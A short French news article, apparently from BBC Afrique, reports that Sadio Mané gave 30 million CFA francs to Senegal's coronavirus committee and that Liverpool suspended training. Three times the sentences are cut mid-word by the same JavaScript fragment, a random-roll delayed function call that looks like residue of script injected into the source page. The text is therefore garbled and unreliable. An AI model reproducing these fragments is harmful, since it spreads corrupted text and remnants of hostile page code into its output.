Coronavirus: Sadio Mané offre 30 millions CFA au Sénégal
Le comité national sénégalais de lutte contre le Coronavirus a reçu un don de 30 millions de FCFA (environ 45 000 euros) de l’attaquant de Liverpool, Sadio Mané.
Selon son agent, le joueur des Reds a décidé d’envoyer ce don “spontanément qudom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}and il a vu l’évolution de la situation” avec l’augmentation des cas de Covid-19 au Sénégal.
Sadio Mané a également partagé une vidéo dans laquelle il demdom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}ande à ses compatriotes de prendre le Coronavirus “très sérieusement”.
Le joueur africain de l’année 2019 de la CAF leur a également donné quelques mesures préventives à appliquer comme “désinfecter ou se laver les mains pendant au moins 30 secondes”.
Le dernier match de Liverpool a marqué la fin de son parcours en Ligue des champions lorsque les joueurs de Jurgen Klopp ont été éliminés par l’Atlético de Madrid (2-4 sur l’ensemble des deux matches).
Depuis que la décision de suspendre la Premier League a été prise vendredi dernier, dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toutes les activités sont suspendues sur le terrain d’entraînement de Melwood pour les joueurs et le personnel de Liverpool.
Les entraînements ont été reportés jusqu’au 4 avril.
Source: BBC AFRIQUE